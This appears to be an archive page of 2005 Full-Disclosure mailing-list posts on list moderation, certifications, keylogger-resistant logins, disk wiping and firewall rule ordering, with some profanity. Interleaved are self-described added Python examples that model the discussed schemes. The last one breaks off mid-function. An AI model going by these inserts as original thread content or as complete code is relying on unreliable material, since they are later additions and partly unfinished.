  To: full-disclosure@lists.grok.org.uk
  Sent: Thursday, December 15, 2005 11:39 AM
  Subject: Re: [Full-disclosure] A CALL FOR FULL-DISCLOSURE TO BECOME
  AMODERATED LIST

  On 12/15/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

  I WOULD JUST LIKE TO EXPRESS MY DEEP SUPPORT FOR THIS IDEA. MAKING THE
  LIST MODERATED WOULD REALLY HELP MY JOB AS A SECURITY RESEARCHER. I COULD
  MAKE QUICKER, MORE WELL INFORMED CHOICES IN MY DAY TO DAY TASKS OF PEN
  TESTING LEGITIMATELY. I WILL ONLY GET THE GOOD STUFF AND NONE OF THIS
  PISSING CONTEST WHICH IS KILLING THIS LIST. MODERATING WOULD MAKE THE
  LIST MUCH MORE PROFESSIONAL AND WOULD BRING IT ONE STEP ABOVE SECURITY
  FOCUS. ONCE AGAIN. I AM 150% FOR THE MODERATION OF FULL-DISCLOSURE.

  no need,

  a) ban all gmail addresses
  b) ban nicknames (real name only)
  c) start enforcing list policy for trouble makers who attack legitimate
  researchers like netdev

Re: [Full-disclosure] Getting rid of n3td3v

2005-12-16 Thread Exibar
LOL

 Bye Steve  sarcasm gunna miss ALL your posts and helpful additions to
the group /sarcasm

  Exibar

- Original Message - 
From: Allen,Steve [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; Cosmin' [EMAIL PROTECTED];
full-disclosure@lists.grok.org.uk; Joe Average [EMAIL PROTECTED]
Sent: Friday, December 16, 2005 10:43 AM
Subject: RE: [Full-disclosure] Getting rid of n3td3v


 hey y'all. my 1st time postin' here. Y'all git rid'a n3td3v  you lose me
 too. Everyone gets 2 b herd here..

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] Behalf Of Xyberpix
 Sent: Friday, December 16, 2005 5:27 AM
 To: Cosmin'; full-disclosure@lists.grok.org.uk; Joe Average
 Subject: Re: [Full-disclosure] Getting rid of n3td3v


 Mm, a slight case of MPD I see...

 xyberpix

 On Fri Dec 16  0:38 , Joe Average [EMAIL PROTECTED] sent:

 
 
 
 On 12/15/05, Stejerean, Cosmin [EMAIL PROTECTED] wrote:
 I have a simple suggestion to get rid of the n3td3v problem. Aside from
 creating a spam filter for every message that contains n3td3v or his email
 address the next best thing to do is simply ignore all his posts. If you
 feel the need to let him know what a big moron he is then please do so
 directly to his email address and do not send it to the list. You do not
 need to prove to anyone else that n3td3v is an idiot; anyone already on the
 lists should know that by now. If we all ignore any messages from n3td3v and
 any thread started by him I hope that he will go away and find someone else
 that will pay attention to his security research.
 
 Cosmin Stejerean
 
 netdev isn't an idiot,
 
 we've had many attacks avoided by him contacting our security address
 


Re: [Full-disclosure] Re: 0-day for sale on ebay - New auction!

2005-12-13 Thread Exibar
and a post-it-note pen with the BlackHat logo on it!

 biddings up to $510 USD!  hell I have some BlackHat stuff that I'll sell
for that price too!  I'll even autograph 2 posters!!!  :-)

 Exibar


- Original Message - 
From: Josh Perrymon [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Tuesday, December 13, 2005 9:56 AM
Subject: RE: [Full-disclosure] Re: 0-day for sale on ebay - New auction!


This guy is now selling an autographed poster...  You gotta be kidding
me ... WTF?

JP

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Monday, December 12, 2005 5:46 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Re: 0-day for sale on ebay - New auction!

It looks like the same person opened another auction:

http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItemitem=6588680836

--
Please do not reply to this address



RE: [spam] Re: [Full-disclosure] Hacking Boot camps!

2005-12-01 Thread Exibar
synchronet!  Me too!   I loved my Synchronet BBS back in the day :-)  RIP
graphic support, all the doors you could muster...

  I had forgotten how much fun the scriptable co-sysop was :-)

  Exibar
 (Exibar's Lair BBS (whoop whoop!)

 -Original Message-
 From: mary [mailto:[EMAIL PROTECTED]
 Sent: Thursday, December 01, 2005 9:25 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [spam] Re: [Full-disclosure] Hacking Boot camps!


  Come on... lets go right old school.  I loved and ran RA

 right old school?  Hm, okies! ..didn't care for RA, personally - I ran
 Synchronet and RENEGADE.  Thinking back.. Synchronet's scriptable co-sysop
 was a lot of fun..

 -m

  Pfft..
 
  RENEGADE all the way :
 
  WWIV was great for modding too.  Vision-X, yep.. I remember a lot of the
  'ansi cool-kids' (or whatever...) running that.
 
  -MH
 
  On Wed, 30 Nov 2005, Christopher Carpenter wrote:
 
 
  Don't forget WWIV and Vision-X. :)
 
 
  WildCAT BBS Anyone  :)
 
  I remember playing tradewars and calling who knows where to get new text
  files :)
 
  Used Tone-loC a lot more back then :)
 
  JP


RE: [inbox] Re: [Full-disclosure] Most common keystroke loggers?

2005-12-01 Thread Exibar
nah, screen grabber and keylogger installed on system, compromised password.

  Biometrics, SecurID, one time password, usb key fob, actual physical key, 
something that is not on the system is what would be needed to be secure... 
perhaps not totally secure, but pretty damn secure using more than just one 
of the above too  a physical key/credit card, USB key, and SecurID used 
together would be pretty secure...  throw in a finger print reader too, why 
not...  hell, DNA scanner like in Gattaca too

 Mike B  

 -Original Message-
 From: Kyle Lutze [mailto:[EMAIL PROTECTED]
 Sent: Thursday, December 01, 2005 7:35 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [inbox] Re: [Full-disclosure] Most common keystroke loggers?
 
 
 Blue Boar wrote:
  Shannon Johnston wrote:
  
  Hi All,
  I'm looking for input on what you all believe the most common keystroke
  loggers are. I've been challenged to write an authentication method (for
  a web site) that can be secure while using a compromised system.
  
  
  I don't think that's possible for all compromise situations, given
  today's desktop OS software.  It might be possible with a Palladium-like
  system (and you trust that the secure side isn't compromised) and/or a
  hardware assist that doesn't trust the host OS (think small USB-attached
  computer on a stick.)
  
  However, given your query, if you simply want to play the known-threats 
  game, you can just require that the Client have up-to-date AV and 
  antispyware software, and scans clean.  That's a little orthogonal to 
  the issue of trying to be secure in the face of a keylogger installed, 
  but probably a better thing to shoot for.
  
  If, for some reason, you only care about the case where a keylogger is
  installed, then you can go with some scheme like making the user pick 
  numbers of a randomly-scrambled keypad on the screen, with the mouse.
  
  Note, however, that keyloggers that grab some portion of the screen 
  surrounding the mouse pointer every time you click have already been 
  observed in the wild.  They are designed to specifically defeat this 
  kind of mechanism.
  
 Actually, I think there's a relatively easy solution, make it so every 
 single time they want to login, have a different set of characters line 
 up to their password.
 That didn't make much sense, here's a good example
 
 say somebody's password is foobar, on screen there would be a page that 
 shows the new alignment of characters, such as saying a=c, d=3, b=z, etc. 
 so instead of typing foobar the password they would type in for that 
 session would be hnnzck.
 
 The next time the screen came up, it would be a=n, b=l, etc. and the 
 password they would enter would be something else. Then, if the computer 
 had a keylogger, not too much anybody could do with that info.
 
 Kyle
 
 
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
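
The per-login character remapping proposed in the quoted message above, modelled as an added example that is not part of the original thread. It shows what a keystroke-only logger and a logger that also captures the screen each learn; the alphabet, the function names and the in-memory password comparison are assumptions made for illustration.

```python
"""Per-session character remapping for password entry, and what an observer learns.
Added example: a constructed model of the scheme, not code from the thread."""
import secrets
import string

# Assumed character set; the thread only shows lowercase letters and a digit.
ALPHABET = string.ascii_lowercase + string.digits


def new_session_map(rng=None):
    """Server side: a fresh random permutation of ALPHABET, displayed for one login."""
    rng = rng or secrets.SystemRandom()
    shuffled = list(ALPHABET)
    rng.shuffle(shuffled)
    return dict(zip(ALPHABET, shuffled))


def user_types(password, session_map):
    """What the user enters after reading the on-screen mapping (a=c, d=3, ...)."""
    return "".join(session_map[c] for c in password)


def server_verifies(typed, session_map, stored_password):
    """Undo this session's mapping and compare in constant time.
    Simplification: a real server would compare a salted hash of the candidate."""
    inverse = {shown: real for real, shown in session_map.items()}
    try:
        candidate = "".join(inverse[c] for c in typed)
    except KeyError:
        return False
    return secrets.compare_digest(candidate, stored_password)


def replay_succeeds(captured_keys, later_map, stored_password):
    """Keystroke-only capture replayed in a later session with a different mapping."""
    return server_verifies(captured_keys, later_map, stored_password)


def recover_with_screen(captured_keys, captured_map):
    """A logger that also grabbed the mapping from the screen inverts it directly."""
    inverse = {shown: real for real, shown in captured_map.items()}
    return "".join(inverse[c] for c in captured_keys)


def repeat_pattern(text):
    """Positions of repeated characters, e.g. 'foobar' -> (0, 1, 1, 2, 3, 4).
    A substitution keeps this pattern, so even keystrokes alone leak the
    password's length and where its characters repeat."""
    first_seen = {}
    return tuple(first_seen.setdefault(c, len(first_seen)) for c in text)


if __name__ == "__main__":
    password = "foobar"                      # constructed sample from the thread
    session_1, session_2 = new_session_map(), new_session_map()
    keys = user_types(password, session_1)
    print("typed this session:      ", keys)
    print("accepted this session:   ", server_verifies(keys, session_1, password))
    print("replay in next session:  ", replay_succeeds(keys, session_2, password))
    print("keys + screen capture -> ", recover_with_screen(keys, session_1))
    print("pattern leaked by keys:  ", repeat_pattern(keys))
```

The remapping stops plain replay of logged keystrokes, but anything displayed on the compromised machine is available to the same malware, which is why the replies point at a factor held off the system.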


RE: [inbox] Re: [Full-disclosure] Hacking Boot camps!

2005-11-28 Thread Exibar
heheh, I surely do :-)

 oh yah, and for those wondering it's NOT a test question that I know of ;-)

 Exibar

 -Original Message-
 From: Disco Jonny [mailto:[EMAIL PROTECTED]
 Sent: Saturday, November 26, 2005 1:59 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: Re: [inbox] Re: [Full-disclosure] Hacking Boot camps!


 erm, he is angry at everyone, you know what a BOFH is yeah?

 On 11/25/05, Exibar [EMAIL PROTECTED] wrote:
  wow, SANS must have really hurt you emotionally to be this pissed at
  them
 
Ex
 


RE: [inbox] Re: [Full-disclosure] Hacking Boot camps!

2005-11-25 Thread Exibar
dude   Those sounds like words that are coming from someone that tried
to pass a SANS exam but failed or someone that thought they could get a
job working for SANS but wasn't accepted  I'm not saying this happened
to you, but there is much emotion in your reply.
   What SANS course are you basing this on?  Did you take any SANS courses?
What would you suggest as more ethical than SANS?  A vendor given course
like Foundstone (McAfee now)?

  Just curious

  Exibar

 -Original Message-
 From: InfoSecBOFH [mailto:[EMAIL PROTECTED]
 Sent: Wednesday, November 23, 2005 12:42 PM
 To: Exibar
 Cc: full-disclosure@lists.grok.org.uk
 Subject: [inbox] Re: [Full-disclosure] Hacking Boot camps!


 On 11/23/05, Exibar [EMAIL PROTECTED] wrote:
  I agree, BUT for someone that is just starting out and wants to get into
  the InfoSec field.  SANS will provide them with a very useful foundation to
  start from.
  if they're a PC tech, and don't know where to start, a SANS type course
  is money well spent.  AS LONG AS they back it up with their own practice and
  research on their own.

 WRONG.  SANS does not provide anything but marketing opportunities for
 vendors who cannot sell product any other way and a thicker wallet for
 those at the top of the pyramid scheme.  I agree that training when
 you are starting out is important but SANS is not an ethical or
 legitimate training institution and does more to harm security than it
 does to help.






RE: [inbox] RE: [Full-disclosure] Hacking Boot camps!: certifications

2005-11-25 Thread Exibar


 So am I any smarter for having my CISSP over a GIAC?... I don't think so..
 but the employers seem to think so =)



Just to chime in a personal opinion. The GIAC exams (NOT their new
Silver level, but the Gold level) are worth more to me than CISSP.  Why do
you ask.  CISSP only requires you to take an exam, pass, and you get your
cert.  The GIAC GOLD certs require you to write a paper, of varying length
per cert, and pass it and 1 or 2 exams in order to get your cert.
   It's one thing to be able to go to a week long class, brush up on a few
points here and there, take an exam and pass to get a cert, CISSP.
   It's another completely different thing to be able to comprehend the
information enough to be able to write a 20 - 75 page paper on the subject,
have it read and graded by experts in the field, and then get the cert. GIAC
   Even though the GIAC certs generally cover a narrow topic compared to
CISSP, you have to know your subject quite well in order to be able to pass
that cert.  Forget about the silver cert for GIAC... just another exam or
two to pass

 IF I was interviewing someone new for a security position, I'd certainly
take this into account before hiring them.  Along with many other factors
too, of course.

 Exibar



RE: [inbox] Re: [Full-disclosure] Hacking Boot camps!

2005-11-25 Thread Exibar
wow, SANS must have really hurt you emotionally to be this pissed at
them

  Ex

 -Original Message-
 From: InfoSecBOFH [mailto:[EMAIL PROTECTED]
 Sent: Thursday, November 24, 2005 4:43 AM
 To: full-disclosure@lists.grok.org.uk
 Subject: [inbox] Re: [Full-disclosure] Hacking Boot camps!


 Bottom line is... and you can ignore the SANS instructor/SANS zealot post...

 SANS = SHIT.

 Now that I am in a position with my employer to hire and fire
 people... I will not even consider an applicant who touts his SANS
 certification as something to be proud of or something to make him
 more skilled than the next.

 And, now that I am in a senior position at my employer, I am doing
 everything I can to stop my employer from paying the EXTORTION fees to
 SANS in order to be a part of their what works program and any of
 their training.

 You know what makes me smile everyday... the knowledge in knowing that
 I am not the only senior infosec person at a major corporation who
 feels this way about SANS.

 Fuck SANS.  FUCK EM ALL!

 http://dictionary.reference.com/search?q=sans#without

 sans( P )  Pronunciation Key  (snz, sä)
 prep.
 Without.


 --
 --
 [Middle English, from Old French, blend of Latin sine, without, and
 absenti, in the absence of, ablative of absentia, absence from absns,
 absent- present participle of abesse, to be away. See absent.]

 On 11/23/05, [EMAIL PROTECTED]
 [EMAIL PROTECTED] wrote:
  Maybe it is not what you know but who you know.  Best of luck with that
  grail thing, finding it is veiled, holding it is easy, keeping it polished
  is where the work is.
 
  --
  vote for me
 
 
   On 11/23/05, [EMAIL PROTECTED]
   [EMAIL PROTECTED] wrote:
   ... the cert game is nothing more than  a lucrative revenue generator. For
   either the test givers or the vendor pusher or the land of test king.
  
   a few respectable names in their roster[1]; i wonder why they don't
   name the instructor giving each presentation on their conference
   schedule[2]...
  
   i have a theory: the more legitimately skilled you are, the less you
   instruct and the more you are paid.  a nice way to convert reputation
   into ca$h!
  
   [maybe i can get in on this racket once i attain the holy grail of
   CPA, GCFW, CISSP, CISM, CISA, CCNA, CCSE, CCSA, GIAC, GCIA, GSNA,
   GCFA, GCIH, GCUX, GSEC, QUE, WTFBBQ]
  
   1. http://www.sans.org/instructors.php
   2. http://www.sans.org/index.php


Re: [Full-disclosure] Hacking Boot camps!

2005-11-23 Thread Exibar
I agree, BUT for someone that is just starting out and wants to get into
the InfoSec field.  SANS will provide them with a very useful foundation to
start from.
   if they're a PC tech, and don't know where to start, a SANS type course
is money well spent.  AS LONG AS they back it up with their own practice and
research on their own.

  Exibar

- Original Message - 
From: InfoSecBOFH [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Tuesday, November 22, 2005 7:53 PM
Subject: Re: [Full-disclosure] Hacking Boot camps!


In my opinion all of the so called hacking training out there is
horrible and nothing more than a money grab.  Look at the SANS
courseware, it is out of date and shit. The best training is to read,
google, and play on your own.


Re: [Full-disclosure] CORE-Impact license bypass

2005-09-27 Thread Exibar

- Original Message - 
From: Marc Maiffret [EMAIL PROTECTED]
To: Exibar [EMAIL PROTECTED]; c0ntex [EMAIL PROTECTED]; Josh
Perrymon [EMAIL PROTECTED];
full-d[EMAIL PROTECTED]
Sent: Monday, September 26, 2005 4:49 PM
Subject: RE: [Full-disclosure] CORE-Impact license bypass


snip
   As far as automated tools go, bah, manually exploiting the
 holes is certainly the way to go.  But, the automated tools
 usually produce nice pretty reports that you can show the
 client.  They just LOVEE pretty reports with many
 bright colors and such for the good stuff and dark hacker
 like colors for the bad stuff :-)

   Exibar
snip

I'm playing devils advocate so its not that I completely disagree but I
think for the average consultant (99% of consultants) using an automated
solution like Core/Canvas is going to do far more for them.

Hiya Marc!
   I completely agree.  I actually like both methods, using an automated
tool like Retina, Nessus, Foundstone, etc to find the vulns and the
weaknesses, then using an individual exploit to try and penetrate that hole.
Canvas / Core also have a very good use as well.  They are quick, easy to
use, and produce those nice reports that the clients like to see, so they
get used as well.
  I didn't mean to imply that the consultants create their own exploits,
not many I know could even begin to do that, only a couple are talented
enough to do just that.  Even for those very few, it's just not feasible
from a time perspective.  Much quicker and more cost effective to use what's
out there.

  Exibar



Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock

2005-09-08 Thread Exibar
I've found out that using Dave's right Sock 1.0 along with Sandals 2.0 will
cause this vulnerability to become very apparent and much worse.  With this
known, Dave's right sock 1.0 should never EVER be used with any version of
Sandals (currently at v2.0).

  exibar


- Original Message - 
From: Dave Cawley [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Thursday, September 08, 2005 12:10 PM
Subject: [Full-disclosure] Secuirty Hole Found In Dave's Sock


Date: 9/8/2005

Vulnerability Found:   Hole In Dave's Socket

Affected System: Dave's Right Sock

Severity: Rating: Moderately Critical
Impact: System access
Where:  Foot

Description of Vulnerability:  This morning while putting my socks
on I found a small (1/4 inch) hole by my big toe. This could be
exploited by a virus through the bottom of the foot or under the
toe nail. This could be used to compromise Dave's entire system.

Solution: No permanent solution is currently available. A work
around is to wear the sock on the other foot to have the hole
above the small toe where it will not be further enlarged, it
will probably fold over and partially cover the vulnerability.
Permanent solution coming in either a sock darning or upgrading
the unit to a new sock.

Time Table: Found at 7:48am on Sept 8th, 1005
Work around figured out at 7:49am on Sept 8th,
2005
Permanent Solution Pending

Credits: Found by Dave

References: No references available.


***
Dave D. Cawley   |
High Speed Internet  |The number of Unix installations
Duryea, PA   | has grown to 10, with more expected.
(570)451-4311 x104   |  - The Unix Programmer's Manual,1972
[EMAIL PROTECTED] |
***
  URL = http://www.adelphia.net


Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock

2005-09-08 Thread Exibar
Because of this hole, SANS have just gone from green to argyle as well

 exibar

- Original Message - 
From: Exibar [EMAIL PROTECTED]
To: Dave Cawley [EMAIL PROTECTED];
full-disclosure@lists.grok.org.uk
Sent: Thursday, September 08, 2005 1:31 PM
Subject: Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock


 I've found out that using Dave's right Sock 1.0 along with Sandals 2.0 will
 cause this vulnerability to become very apparent and much worse.  With this
 known, Dave's right sock 1.0 should never EVER be used with any version of
 Sandals (currently at v2.0).

   exibar




Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock

2005-09-08 Thread Exibar
the Solomon socks. long may they live :-)

Exibar
- Original Message - 
From: Mary Landesman [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Thursday, September 08, 2005 2:33 PM
Subject: Re: [Full-disclosure] Secuirty Hole Found In Dave's Sock


 This flaw is incredibly old. In the latter part of the 90s, Dr. Solomon's
 antivirus team assisted afflicted users by distributing socks at various
 worldwide conferences. Alas, the socks - and presumably the antivirus
 software - were later acquired by McAfee, Inc. Since then, McAfee has not
 only failed to continue supporting the socks that were released by Solomon,
 it has not updated nor released any further socks. As such, the
 vulnerability has been largely ignored - only to be 'rediscovered' by Dave
 several years later.

 Another flaw with Dave's report: He indicates the vulnerable system is the
 Right sock. Indeed, research consistently indicates the Left sock is equally
 vulnerable.

 Regards,
 -- Mary



Re: [Full-disclosure] Disk Cleaning Tools

2005-08-31 Thread Exibar
Dban gets my vote as well.  Plus can't beat the price, it's Free :-)

 Exibar


- Original Message - 
From: the.soylent [EMAIL PROTECTED]
To: Bob the Builder [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Wednesday, August 31, 2005 9:48 AM
Subject: Re: [Full-disclosure] Disk Cleaning Tools


 
 
 
 I prefer Darik's Boot and Nuke
 get it here: http://dban.sourceforge.net/
 
 cheers, soylent
 
 
 
 
 
 Bob the Builder schrieb:
  Hi,
  I am looking at software for securely erasing information on disks.
  Other than stuff like Eraser and Cleanup what other tools have people
  found useful/reliable.
  
  Cheers,
  
  Bob
  
  


Re: Fwd: [Full-disclosure] Disk Cleaning Tools

2005-08-31 Thread Exibar
yup, use Dban first to wipe the drive, then re-image it...you do have a
clean image to revert back to right? :-)

  or use VMware and revert back to the snapshot after wiping the drive.

 Exibar

- Original Message - 
From: Bob the Builder [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wednesday, August 31, 2005 10:37 AM
Subject: Re: Fwd: [Full-disclosure] Disk Cleaning Tools


 Hmm, perhaps I should have clarified, I was hoping to be able to use the
 disk and operating systems afterwards, I was looking for a more surgical
 approach, i.e. deleting specific files, or even better something clever
 enough to know what registry keys and directories to wipe to save an
 infinite quantity of setting up.

 Cheers,

 Bob

 On Wed, 2005-08-31 at 14:47 +0100, Marek Isalski wrote:
 Pillar-drill, every time.
 
   winsoc [EMAIL PROTECTED] 31/08/2005 14:44:23  You could use
 semtex, this will certainly erase all your pr0n and other nasty habits from
 your drives.




Re: [Full-disclosure] Re: JA

2005-08-29 Thread Exibar
I don't know about y'all, but if I was admin of a public ISP (or whatever),
I wouldn't want to give anyone the idea that I'm smarter than everyone on
the list that's just begging to be hacked/defaced/owned/etc

 exibar

- Original Message - 
From: Bardus Populus [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Monday, August 29, 2005 1:02 AM
Subject: [Full-disclosure] Re: JA


[EMAIL PROTECTED], please follow your own rules.

Missouri FreeNet staff and users are both held to the same general rules
of conduct, as only a uniform policy of openness and respect can be
reasonably expected to further MFN's goal of universal education.

-bp


RE: [inbox] [Full-disclosure] RE: Example firewall script

2005-08-28 Thread Exibar
Wasn't the original poster's question about FW rules and not ACL's?

 If you had ONLY Allow ANY ANY, why bother having the firewall in place at
all?  You'll never be LESS secure from the nasties on the 'net than that...
well unless you're just running a base un-patched OS, etc...
 If you had only Deny ANY ANY, nothing would get in or out through that
firewall, so why wouldn't that be the most secure rule?  Again, might as
well just unplug from the 'net completely, you'll never be more secure from
the nasties on the 'net than that.

  I kinda assumed that people would realize that these are not practical
rules to have in place without other rules backing them up.  I for one don't
believe you should EVER have an Allow ANY ANY rule, anywhere in your rule
list, Deny ANY ANY should be the last rule, IMHO.

  heheh, I never meant to be the catalyst for such a huge battle between
people

  Exibar

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
 Sent: Saturday, August 27, 2005 12:42 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [inbox] [Full-disclosure] RE: Example firewall script



 

 =
 ORIGINAL MESSAGE:
 -
 Date: Sat, 27 Aug 2005
 From: Exibar
 Subject: Example firewall script

 The absolute worst Firewall rule
 you can have:
 
  Allow ANY ANY
 
 The best:
 
   Deny ANY ANY
 =

 REPLY:
 ---

 Actually, that's not true.
 I would agree that as a general rule of thumb
 you should have a deny statement at the end
 of every ACL. In fact, Cisco places an implicit
 DENY ANY ANY at the end of their ACL's
 automatically.

 However, Access Control Lists are not firewalls.
 Yes, we use them as firewalls, but that's not what
 they are.

 ACL's ARE TRAFFIC SHAPING DEVICES.

 As traffic shaping devices, they can be used for
 security, but they are also used for management
 purposes. For instance; many Autonomous Systems
 are multi-homed. There are decisions to be made
 about how traffic will flow in and out of the AS.
 You also have to decide if you wish to be a
 transit AS or not.

 ACLs are the tool that you use to control your
 traffic.

 While an ACL being used as a security device
 should have a deny statement at the end, proper
 construction of the ACL is more about following
 the proper construction rules.

 This is actually a huge subject, far too big
 for an individual e-mail to a list.

 But there are some basic rules to keep in mind:

 ACL's analyze traffic from top to bottom, so
 keep your most specific entries at the top,
 with more general entries near the bottom;
 and do your permits before your denys.
 That means you deal with hosts first, then
 subnets, then  networks, and at each level
 you have your permit statements  before your
 deny statements. The reason for this is because
 once a packet matches a line, it's dealt with
 right then and there. You don't want to have
 a packet thrown away just before a line that
 would have permitted it.

 There are also issues of what KIND of ACL to
 use and where  to place them; Inbound or Outbound.

 In terms of the original question, the only
 difference between a good line item or a
 bad line item is whether or not the syntax
 is correct.

 The only difference between a good ACL
 and a bad ACL is  whether or not its
 structure is properly designed and whether
 or not it's placed in the proper location.


 This subject REALLY calls for a book, not
 an e-mail response. I've said very little
 in this post and look at all the room
 it took up.

 ++

 
 mail2web - Check your email from the web at
 http://mail2web.com/ .






___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
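
The top-to-bottom, first-match behaviour and the "hosts, then subnets, then networks, permits before denies" ordering described in the quoted reply above, as an added example that is not part of the original thread. It models a source-address-only list with an implicit deny at the end; the rule set, addresses and function names are constructed for illustration.

```python
"""First-match ACL evaluation with an implicit deny, plus a shadowed-rule check.
Added example: the rule set below is constructed, not taken from the thread."""
from ipaddress import ip_address, ip_network
from typing import NamedTuple


class Rule(NamedTuple):
    action: str   # "permit" or "deny"
    source: str   # CIDR; "0.0.0.0/0" plays the role of ANY

    @property
    def net(self):
        return ip_network(self.source)


def evaluate(rules, src):
    """Return (action, matching line number); line 0 means the implicit deny."""
    addr = ip_address(src)
    for line, rule in enumerate(rules, start=1):
        if addr in rule.net:
            return rule.action, line      # first match wins, later lines never run
    return "deny", 0                      # implicit DENY ANY at the end of the list


def shadowed(rules):
    """Find rules that can never match because an earlier, broader rule covers them.
    Returns (line, earlier_line, kind); kind is "conflict" when the actions differ."""
    findings = []
    for i, later in enumerate(rules):
        for j, earlier in enumerate(rules[:i]):
            if later.net.subnet_of(earlier.net):
                kind = "conflict" if later.action != earlier.action else "redundant"
                findings.append((i + 1, j + 1, kind))
                break
    return findings


def order_specific_first(rules):
    """Longest prefix (hosts) first; within one prefix length, permits before denies."""
    return sorted(rules, key=lambda r: (-r.net.prefixlen, r.action != "permit"))


# Constructed sample: the management host is meant to be allowed, the rest of
# its network blocked, and a partner range allowed.
AS_WRITTEN = [
    Rule("deny", "10.1.0.0/16"),
    Rule("permit", "10.1.2.7/32"),
    Rule("permit", "192.0.2.0/24"),
]

if __name__ == "__main__":
    print("as written:", evaluate(AS_WRITTEN, "10.1.2.7"), shadowed(AS_WRITTEN))
    fixed = order_specific_first(AS_WRITTEN)
    for line, rule in enumerate(fixed, start=1):
        print(line, rule.action, rule.source)
    print("reordered: ", evaluate(fixed, "10.1.2.7"), shadowed(fixed))
    print("unlisted:  ", evaluate(fixed, "203.0.113.5"))
```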


RE: [inbox] RE: [Full-disclosure] RE: Example firewall script

2005-08-28 Thread Exibar
Exactly!  FireWall 101 if you will :-)

 Exibar

 -Original Message-
 From: Jan Nielsen [mailto:[EMAIL PROTECTED]
 Sent: Saturday, August 27, 2005 2:25 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [inbox] RE: [Full-disclosure] RE: Example firewall script 
 
 
 I think the rules explained here are not intended to be actual rules in
 a firewall, but more of a way to explain what is secure and what is not,
 correct me if I'm wrong. Oh and btw, ACLs ARE used in CBAC (Cisco IOS
 fw) they are just a tad more intelligently created than in a regular
 ACL.
 
 
 Jan
 
 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
 Sent: 27. august 2005 18:42
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] RE: Example firewall script 
 
 
 
 
 =
 ORIGINAL MESSAGE:
 -
 Date: Sat, 27 Aug 2005
 From: Exibar 
 Subject: Example firewall script
 
 The absolute worst firewall rule 
 you can have:
 
  Allow ANY ANY
 
 The best:
 
   Deny ANY ANY
 =
 
 REPLY:
 ---
 
 Actually, that's not true.
 I would agree that as a general rule of thumb
 you should have a deny statement at the end
 of every ACL. In fact, Cisco places an implicit
 DENY ANY ANY at the end of their ACLs
 automatically.
 
 However, Access Control Lists are not firewalls.
 Yes, we use them as firewalls, but that's not what
 they are.
 
 ACLs ARE TRAFFIC SHAPING DEVICES.
 
 As traffic shaping devices, they can be used for
 security, but they are also used for management
 purposes. For instance; many Autonomous Systems
 are multi-homed. There are decisions to be made
 about how traffic will flow in and out of the AS.
 You also have to decide if you wish to be a 
 transit AS or not. 
 
 ACLs are the tool that you use to control your 
 traffic.
 
 While an ACL being used as a security device 
 should have a deny statement at the end, proper 
 construction of the ACL is more about following 
 the proper construction rules.
 
 This is actually a huge subject, far too big 
 for an individual e-mail to a list.
 
 But there are some basic rules to keep in mind:
 
 ACLs analyze traffic from top to bottom, so
 keep your most specific entries at the top,
 with more general entries near the bottom;
 and do your permits before your denys.
 That means you deal with hosts first, then
 subnets, then networks, and at each level
 you have your permit statements before your
 deny statements. The reason for this is because
 once a packet matches a line, it's dealt with
 right then and there. You don't want to have
 a packet thrown away just before a line that
 would have permitted it.
 
 There are also issues of what KIND of ACL to
 use and where to place them; Inbound or Outbound.
 
 In terms of the original question, the only
 difference between a good line item or a
 bad line item is whether or not the syntax
 is correct.
 
 The only difference between a good ACL
 and a bad ACL is whether or not its
 structure is properly designed and whether
 or not it's placed in the proper location.
 
 
 This subject REALLY calls for a book, not 
 an e-mail response. I've said very little 
 in this post and look at all the room 
 it took up.
 
 
 
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
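
The first-match ordering rule discussed in the thread above, as an added example that is not part of any poster's message: a small evaluator for a source-only ACL plus a check for entries that can never match because an earlier, broader entry covers them. The rule format, addresses and function names are constructed for illustration, and the implicit deny at the end follows the behaviour the thread describes.

```python
import ipaddress

# Constructed sample ACLs (source-only, standard-style); addresses are made up.
BAD_ORDER = [
    ("deny",   "10.1.0.0/16"),    # general subnet rule placed first
    ("permit", "10.1.5.20/32"),   # host exception: never reached
    ("permit", "10.0.0.0/8"),
]
GOOD_ORDER = [
    ("permit", "10.1.5.20/32"),   # host first
    ("deny",   "10.1.0.0/16"),    # then subnet
    ("permit", "10.0.0.0/8"),     # then network
]

def parse(acl):
    return [(action, ipaddress.ip_network(net)) for action, net in acl]

def evaluate(acl, src):
    """Return (action, line_number) of the first entry matching src."""
    addr = ipaddress.ip_address(src)
    for lineno, (action, net) in enumerate(parse(acl), start=1):
        if addr in net:
            return action, lineno      # first match wins, later lines are ignored
    return "deny", None                # implicit deny at the end of the list

def shadowed(acl):
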